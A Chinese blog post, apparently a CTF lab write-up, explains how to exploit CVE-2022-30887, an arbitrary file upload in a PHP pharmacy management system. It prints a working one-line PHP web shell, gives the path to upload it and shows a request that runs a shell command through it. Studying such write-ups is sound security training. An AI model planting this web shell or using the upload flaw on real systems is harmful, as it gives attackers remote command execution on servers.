首页 > 其他分享 >春秋云镜-CVE-2022-30887

春秋云镜-CVE-2022-30887

时间:2023-02-22 10:22:11浏览次数:41  
标签:30887 php 云镜 该软件 2022 Medicine CVE 上传

春秋云镜-CVE-2022-30887

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

进入环境是一个登录页面,尝试了一下密码重置,但是没有跳转。

 

1.使用社工方法

点击下方的作者,然后进入作者的主页,点击一个项目,上面出现作者的邮件

 

2.在Medicine的栏目上选择“Add Medicine”,上传shell.php

是一句话shell

<?php
if($_REQUEST['cmd']) {
  system($_REQUEST['cmd']);
  } else phpinfo();
?>

  

 3.上传成功后会,转到Manage Medicine栏目,复制刚刚上传的图片的地址,并访问。

 

 

成功phpinfo

4.直接传cmd

your-url/assets/myimages/shell.php?cmd=cat /flag

5.Get Flag

 

 

标签:30887,php,云镜,该软件,2022,Medicine,CVE,上传
From: https://www.cnblogs.com/manmanwei/p/17141946.html

相关文章

  • 修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南
    作者:老Z,中电信数智科技有限公司山东分公司运维架构师,云原生爱好者,目前专注于云原生运维,云原生领域技术栈涉及Kubernetes、KubeSphere、DevOps、OpenStack、Ansible等。前......
  • 修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南
    作者:老Z,中电信数智科技有限公司山东分公司运维架构师,云原生爱好者,目前专注于云原生运维,云原生领域技术栈涉及Kubernetes、KubeSphere、DevOps、OpenStack、Ansible等。......
  • CouchDB 漏洞复现 CVE-2017-12635/12636
    前言CouchDB是一个开源的面向文档的数据库管理系统,可以通过RESTfulJavaScriptObjectNotation (JSON)API 访问。CVE-2017-12635是由于Erlang和JavaScript对JSON解......
  • ESXi 主机补丁升级(OpenSLP 堆溢出漏洞CVE-2021-21974)
    ESXi主机补丁升级(OpenSLP堆溢出漏洞CVE-2021-21974)一、环境说明漏洞名称:VMwareESXiOpenSLP堆溢出漏洞CVE-2021-21974漏洞危害:组件名称:VMwareESXi影响范围:VMware......
  • nginx禁用3DES和DES弱加密算法,保证SSL证书安全 SSL/TLS协议信息泄露漏洞(CVE-2016-218
     cp-rnginx-1.19.2./nginx-1.19.2.bak查看完旧版本信息可以执行如下命令,给旧版本改个名mv./nginx./nginx.old漏洞名称SSL/TLS协议信息泄露漏洞(CVE-2016-2183)......
  • CVE-2016-2183(SSL/TLS)漏洞的办法
    运行gpedit.msc,打开“本地组策略编辑器” 启用“SSL密码套件顺序”  TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_......
  • JQuery原型污染漏洞-CVE-2019-11358
    漏洞概述      原型污染漏洞指的是攻击者修改JavaScript对象原型的能力。JavaScript对象就像变量一样,但存储的并非一个值(varcar=“Fiat”),而是能够包含基于......
  • CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现
    免责声明文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!GoAnywhereMFTGoAnywher......
  • CentOS7 更换阿里云镜像源
    前戏需要有服务器或虚拟机操作系统为Centos7的环境手动配置备份官方的原yum源的配置此步骤必不可少mv/etc/yum.repos.d/CentOS-Base.repo/etc/yum.repos.d/CentOS-Bas......
  • Tomcat漏洞(CVE-2017-12615)复现
     漏洞原理:漏洞原理:Tomcat配置文件/conf/web.xml配置了可写(readonly=false),导致可以使用PUT方法上传任意文件,攻击者将精心构造的payload向服务器上传包含任意代码的JSP......